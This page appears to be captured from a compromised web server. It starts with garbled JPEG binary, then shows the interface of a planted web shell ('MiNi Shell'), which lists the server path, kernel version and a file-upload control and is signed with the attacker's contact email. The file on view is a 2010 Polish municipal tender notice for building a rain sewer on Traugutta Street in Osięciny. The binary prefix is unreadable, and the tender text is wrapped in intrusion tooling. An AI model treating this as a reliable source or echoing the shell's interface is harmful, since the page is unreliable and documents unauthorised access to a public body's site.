JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12906-N-2010.html

<p class="kh_header"><b>Osięciny: Budowa kanalizacji deszczowej w ul. Traugutta miejscowości Osięciny, gm. Osięciny.</b><br>
<b>Numer ogłoszenia: 12906 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osięciny , ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, woj. kujawsko-pomorskie, tel. 054 2650030, 2650034, faks 054 2650185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ug-osieciny.samorzady.pl; www.osieciny.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji deszczowej w ul. Traugutta miejscowości Osięciny, gm. Osięciny..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pod nazwą: Budowa kanalizacji    deszczowej w ul. Traugutta miejscowości Osięciny, gm. Osięciny.
2.1. W zakres robót wchodzą następujące elementy:
- sieć kanalizacyjna o następującej charakterystyce:
  materiał - rury kanalizacyjne  PCV o średnicy 200 mm., typ ciężki
  długość rurociągu - L = 367 mb.
- studnie rewizyjne przepływowe:
  materiał: - kręgi żelbetowe o średnicy 1000 mm.
- płyty pokrywowe żelbetowe o średnicy 1200 mm. z otworem włazowym 
  o średnicy 600 mm.                     
- włazy żeliwne o średnicy 600 mm., typ ciężki;
  ilość - 7 szt.
- uliczne wpusty deszczowe:
  materiał: - kręgi żelbetowe o średnicy 600 mm.
- płyty pokrywowe żelbetowe o średnicy 800 mm. z otworem na wpust
o średnicy 425 mm
- wpusty żeliwne o wym. 500x500 mm. D-400;
   ilość - 14 szt.
- przykanaliki odpływowe:
  materiał: - rury kanalizacyjne PCV o średnicy 150 mm. - typ ciężki
  długość -  63 mb.    
2.2. Materiał.
2.2.1. Kolektor kanalizacji deszczowej, grawitacyjny  należy  wykonać  z  rur   kanalizacyjnych  PCV, typu ciężkiego  o średnicy wewnętrznej 200 mm. łączonych na uszczelki gumowe.    
Długość projektowanego kolektora  wynosi:  L = 367 mb.
2.2.2. Studnie  kanalizacyjne - na projektowanym  kolektorze  przewidziano  wykonanie   typowych  studni rewizyjnych - przepływowych z osadnikami. 
Studnie należy wykonać z kręgów żelbetowych o średnicy 1,0 m.
Zostały zaprojektowane studnie o  głębokości H - do 1,5 m  w liczbie  7 szt.
2.2.3. Wpusty  deszczowe uliczne - w ciągu ulicy Traugutta, przy krawężnikach, po obu stronach jezdni - zaprojektowano  żeliwne wspusty uliczne wykonane z kręgów żelbetowych o średnicy  600 mm. z osadnikami.  Liczba wpustów - 14 szt.
Podłączenie wpustów ulicznych do studni rewizyjnych  zaprojektowano z rur PCV kanaliza-cyjnych, typ ciężki o średnicy wewnętrznej 150 mm. 
Długość zaprojektowanych podłączeń  wynosi: L = 63 mb.   
Łączna długość projektowanych  urządzeń kanalizacyjnych wynosi: L = 430 mb.                                                                         
2.3.Wytyczne  realizacyjne  kanalizacji  deszczowej.                                                                                              2.3.1.  Roboty  ziemne - kolektor deszczowy.
W trakcie  prowadzenia  robót  ziemnych  należy  przestrzegać  ustaleń  obowiązujących   norm  oraz  warunków  bhp.
Roboty ziemne związane  z  układaniem  kolektora  kanalizacji deszczowej  będą  wykonywane ręcznie  - 100 %.
Kolektor kanalizacyjny o średnicy 200 mm. należy  układać  w typowych wykopach kanalizacyjnych  otwartych. Z uwagi na głębokość wykopów - nie przewiduje się szalowania wykopów. 
Rozpoczęcie robót  ziemnych uwarunkowane jest wytyczeniem przez służby geodezyjne -  trasy projektowanego kolektora - w terenie.
Przed rozpoczęciem prac wykopowych należy zabezpieczyć wytyczoną oś wykopu oraz  wyznaczyć jego obrys.
Ziemię z wykopów należy  składować po jednej jego stronie, zachowując odległość pryzmy  od krawędzi wykopu mim. 0,7-1,0 m.
Nie wolno składować urobku na trasie istniejących przewodów wodociągowych oraz należy  zabezpieczyć przed zasypaniem istniejące zasuwy i hydranty p.poż., zapewniając łatwy do Kanał należy  układać  na  podsypce  wyrównawczej  z  piasku o grubości  20   cm, równomiernie  zagęszczonej  i  uformowanej  na  kąt 90 stopni.  
W  ramach  posadowienia - rury  należy  zabezpieczyć  obsypką  ochronną z piasku.
Obsypkę  ochronną  należy  wykonać  z  selekcjonowanego  gruntu  rodzimego
do  wysokości  30 cm  powyżej  wierzchu  rury. Obsypkę  ochronną  należy  równomiernie    zagęścić. Stopień  zagęszczenia  obsypki  kanałów  grawitacyjnych na całej ich długości - 95%.
Obsypka  stanowi  pierwszą  fazę  zasypywania  kolektora.
Całość  zasypki  należy  wykonywać  warstwami z  zagęszczaniem.
 Istniejące  uzbrojenie  podziemne  krzyżujące  się  z  trasą  wykopów  należy  zabezpieczyć   poprzez  obudowanie  i  podwieszenie  w  wykopie.
W przypadku  natrafienia  na  niezinwentaryzowane  elementy uzbrojenia  terenu, należy   bezzwłocznie  powiadomić  właściciela   urządzeń.
Szczególną  uwagę należy zachować przy prowadzeniu robót ziemnych oraz instalacyjno- montażowych w miejscach zbliżeń do istniejących drzew - zabezpieczając korzenie przed  uszkodzeniem.
Przed  przystąpieniem  do  robót  należy  bezwzględnie  zapoznać się z  warunkami
zawartymi  w  załączonych uzgodnieniach dokumentacji projektowej.
2.3.2. Warunki gruntowo-wodne.
Dla terenu objętego niniejszym opracowaniem Inwestor nie dysponuje badaniami 
gruntowymi. W przypadku zaistnienia konieczności odwadniania wykopów           na   poszczególnych  odcinkach należy te prace wykonywać przez odpompowywanie  wody z wykopu  przy użyciu pompy elektrycznej lub spalinowej.  
W celu rozliczenia  kosztu odwadniania wykopów, należy  prowadzić dziennik czasu 
 pracy pomp, w którym rzeczywisty czas pompowań potwierdzany będzie przez 
 przedstawiciela Inwestora - Inspektora Nadzoru.

2.3.3. Roboty  montażowe  należy  prowadzić  zgodnie  z  obowiązującymi  Warunkami  technicznymi  wykonania  i  odbioru  robót  budowlano-montażowych. cz. II  Instalacje sanitarne i przemysłowe oraz  uwzględniając  wytyczne  n.p. producenta  stosowanych  materiałów.
 Do  montażu  można  przystąpić  po  dokładnym,  ręcznym  wyrównaniu  podłoża,
 usunięciu  kamieni   i  wyprofilowaniu  gruntu  na kąt 90 stopni.      
 Przewody  z  PCV  -  nie  wymagają  powłok ochronnych.
Długość projektowanego grawitacyjnego kolektora deszczowego  wynosi:             L = 367,0  mb.
2.3.4.  Studnie  kanalizacyjne.
Na  projektowanym  kanale  przewidziano  wykonanie  studni  kanalizacyjnych-   rewizyjnych, przepływowych z osadnikami. 
Projektowane  studnie  kanalizacyjne  należy  wykonać  z  kręgów  żelbetowych 
o  średnicy  1000 mm, przykrytych  płytami  prefabrykowanymi, żelbetowymi  
z otworem na właz.  Płyty te pełnią role pierścieni odciążających.
Część  przydenną  studni  wraz  z  płytą  denną  należy  wykonać  jako  wylewane  na     mokro z  betonu  B-15.
Pod  płytą  denną  należy  wykonać  warstwę  wyrównawczą z chudego  betonu  grubości   10 cm.  
2.3.5. Uliczne wpusty deszczowe.       
Dla odprowadzenia wód opadowych z obszaru objętego niniejszym opracowaniem -
przewidziano zainstalowanie ulicznych wpustów deszczowych w liczbie 14 szt. 
Wpusty zlokalizowane są parzyście w ciągu ulicy Traugutta, po obu stronach jezdni.
Wpusty uliczne przewidziano do wykonania jako studnie żelbetowe o średnicy 600mm. z osadnikiem.
Studnia przykryta będzie płytą nadstudzienną o średnicy 800mm. z otworem na wpust uliczny  o średnicy 425 mm.
Płyta nadstudzienna pełnić będzie rolę pierścienia odciążającego.
W otworze płyty nadstudziennej umieszczony będzie wpust deszczowy, żeliwny,    o wymiarach  500x500 mm. - typ D-400.
Odprowadzenie wód opadowych do kolektora kanalizacji deszczowej przewidziano rurą   kanalizacyjną PCV typ ciężki o średnicy wewnętrznej 150 mm.
Zaprojektowano przykanaliki  o długości:  L1 = 7 mb. L2 = 2 mb.
Łączna długość przykanalików deszczowych  wynosi: L = 63 mb.               
  
2.4. Przedmiot zamówienia opisany został za pomocą dokumentacji projektowej oraz  specyfikacji technicznej wykonania i odbioru robót załączonych do specyfikacji istotnych warunków zamówienia i stanowiących jej integralną część. 
2.5.Okres gwarancji wymagany przez Zamawiającego - 36 miesięcy
2.6. Zaleca się wizytację przyszłego placu budowy.
2.7. Szczegółowe informacje dotyczące rozwiązań technicznych kolektora kanalizacji deszczowej, wytycznych w zakresie robót ziemnych, instalacyjno- montażowych, warunków gruntowo-wodnych,  studni kanalizacyjnych oraz informacji dotyczącej bezpieczeństwa i ochrony zdrowia zawarte są w projekcie budowlanym, stanowiącym załącznik do niniejszej siwz.                                   Zamówienie poniżej 4.845.000 euro.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. W niniejszym postępowaniu Zamawiający wymaga  wniesienia wadium               w wysokości 3.300,00 zł   (słownie: Trzy tysiące trzysta złotych 00/100)

2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm)

3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy  Urzędu Gminy Osięciny  KDBS Oddział Osięciny 72 9550 0003 2002 0000 0101 0002  z dopiskiem na blankiecie przelewu wadium na zabezpieczenie oferty przetargowej - Budowa kanalizacji    deszczowej w ul. Traugutta miejscowości Osięciny.  Kopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
 
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniu pieniężnym SKOK lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed­siębiorczości, należy w formie  nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię potwierdzoną  za zgodność z oryginałem załączyćdo oferty.

5. Wadium należy wnieść przed upływem terminu składania ofert. tj. do dnia          8 lutego 2010 r. do godz. 9:00.
6. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie   zaliczone na rachunku bankowym Zamawiającego.
7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
8. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem  art. 46 ust. 4a ustawy.
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci niezwłocznie wadium po zawarciu umowy w sprawie zamówienia publicznego.
10. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podst. art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:                                                                                                                              
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej    za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14. Zamawiający zatrzyma wadium wraz z odsetkami,  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  określone w art. 22 ust. 1 ustawy Pzp, t.j.: 
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek  ich posiadania;
b)  posiadają wiedzę i doświadczenie;
c) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania   zamówienia; 
d) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie       zamówienia; 
4.2. Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
a) Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności oraz warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, oraz dysponowania potencjałem technicznym, jeżeli Wykonawca oświadczy, że spełnia warunki udziału w postępowaniu określone w pkt 4.1 siwz i art.22 ust.1 ustawy Pzp.
b)   Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, co najmniej dwóch zadań polegających na budowie, remoncie sieci wodociągowej lub kanalizacyjnej, na łączną kwotę nie mniejszą niż 100.000,00 zł. brutto lub jednego zadania, na kwotę nie mniejszą niż  50.000,00 zł.
c)  Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże dysponowanie kierownikiem budowy, posiadającym uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych oraz aktualny wpis we właściwej izbie samorządu zawodowego.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału         w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawcy złożą niżej wymienione dokumenty.
1. Celem potwierdzenia spełniania wszystkich warunków udziału w postępowaniu  Wykonawca złoży oświadczenie o spełnianiu tych warunków o treści odpowiadającej treści art. 22 ust. 1 ustawy - Prawo Zamówień Publicznych wg załącznika nr 2 do siwz.
2. Celem wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Wykonawca załączy do oferty:
a)  oświadczenie o braku podstaw do wykluczenia wg załącznika nr 3 do siwz
b) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do   rejestru,w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy  
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
d) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
f) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3. Celem potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia, opisanego w pkt 4, ppkt 4.2. lit. b)  siwz, Wykonawca załączy do oferty:
a) wykaz robót budowlanych, zgodnie z wymaganiami określonymi w pkt 4, ppkt 4.2. lit. b), z podaniem ich rodzaju i wartości, daty i miejsca wykonania wg załącznika nr 5 do siwz
b) dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 4. Celem potwierdzenia spełniania warunku dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, opisanego w pkt 4, ppkt 4.2. lit.c) niniejszej siwz, Wykonawca załączy do oferty:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z podaniem  informacji na temat kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych czynności oraz informacją o podstawie do dysponowania tymi osobami wg załącznika nr 6 do siwz
b) dokumenty potwierdzające, że ujęte ww wykazie osoby posiadają: 
- uprawnienia do kierowania robotami  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych
- aktualny wpis we właściwej izbie samorządu zawodowego
c) jeżeli Wykonawca wykazał, że będzie dysponował osobami innych podmiotów, do oferty należy załączyć dokument potwierdzający, że Wykonawca będzie dysponował tymi osobami, w szczególności przedstawić pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji tych osób na okres korzystania z nich przy wykonywaniu zamówienia  
       5. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca załączy do oferty dokumenty, o których mowa w pkt 2 niniejszego ogłoszenia dotyczące tych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:bip.ug-osieciny.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14, 88-220 Osieciny, pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 10:00, miejsce: Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14, 88-220 Osięciny, sekretariat- pokój nr 19, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com